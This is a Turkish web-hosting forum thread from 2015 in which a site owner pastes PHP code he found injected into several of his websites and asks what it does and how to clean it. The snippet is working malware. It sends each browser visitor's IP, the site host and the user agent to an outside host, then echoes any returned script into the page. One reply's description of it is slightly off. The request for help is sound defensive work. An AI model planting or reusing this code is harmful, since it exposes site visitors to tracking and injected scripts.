• 27-03-2015, 17:47:42
    #1
    Merhaba Arkadaşlar..

    Web Sayfalarımdan Birinde Bi Kod'a Rastladım. Ardından Bi Tanesinde Daha.. Ardından Başka Bi Sunucudaki Başka Bi Sitemde de Aynı Koda Rastladım.. Rastlantı Yada Hack Diye Düşündüm Ama Bi Türlü Anlam Veremedim..

    Curl Kütüphanesi ile İp Adresi Değişkene Atıyo Bişey Bi Yere Yazıyo Bişeyler Ediyor Ama Tam Anladım Desem Yalan Olur..

    Hack Girişimi Olabilir Diyede Sizinle Paylaşmak İstedim.. Yada Bilgisayarımda Bi Virüs Filanmı Var.. Anlamadım Açıkcası.

    Koda Gelecek Olursak :

    #5360b1#
    error_reporting(0); @ini_set('display_errors',0); $wp_v43 = @$_SERVER['HTTP_USER_AGENT']; if (( preg_match ('/Gecko|MSIE/i', $wp_v43) && !preg_match ('/bot/i', $wp_v43))){
    
    $wp_v0943="http://"."https"."http".".com/"."http"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_v43);
    
    if (function_exists('curl_init') && function_exists('curl_exec')) {$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_v0943); curl_setopt ($ch, CURLOPT_TIMEOUT, 20); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    
    $wp_43v = curl_exec ($ch); curl_close($ch);} elseif (function_exists('file_get_contents') && @ini_get('allow_url_fopen')) {$wp_43v = @file_get_contents($wp_v0943);}
    
    elseif (function_exists('fopen') && function_exists('stream_get_contents')) {$wp_43v=@stream_get_contents(@fopen($wp_v0943, "r"));}}
    
    if (substr($wp_43v,1,3) === 'scr'){ echo $wp_43v; }
    #/5360b1#
    Sorun Hem Windows Sunucumda Hem Linux Sunucumda Var.. Windows Yapı İtibari ile Biraz Eski Olsada Linux Sunucu Cent-os 6.5 Cpanel 11 Filan..

    Yardım Edecek Arkadaşlara Şimdiden Teşekkürler.
  • 27-03-2015, 19:11:01
    #2
    http://httpshttp.com/
    adresine ip numaranızı, site adını ve user agent bilgisi gönderiyor.

    daha sonra dönen cevabı sunucunuzda çalıştırmaya çalışıyor.
  • 28-03-2015, 10:42:59
    #3
    Peki Nerden Bulaşabilir Bu Kod Bilgisi Olan Varmı ? Nasıl Temizlicem.. Daha Önemlisi Bulaşmasını Nasil Engelleyeceğim.
  • 08-04-2015, 17:30:02
    #4
    Bu Kod Yada Site Hakkında Bilgisi Olan Yok mu ?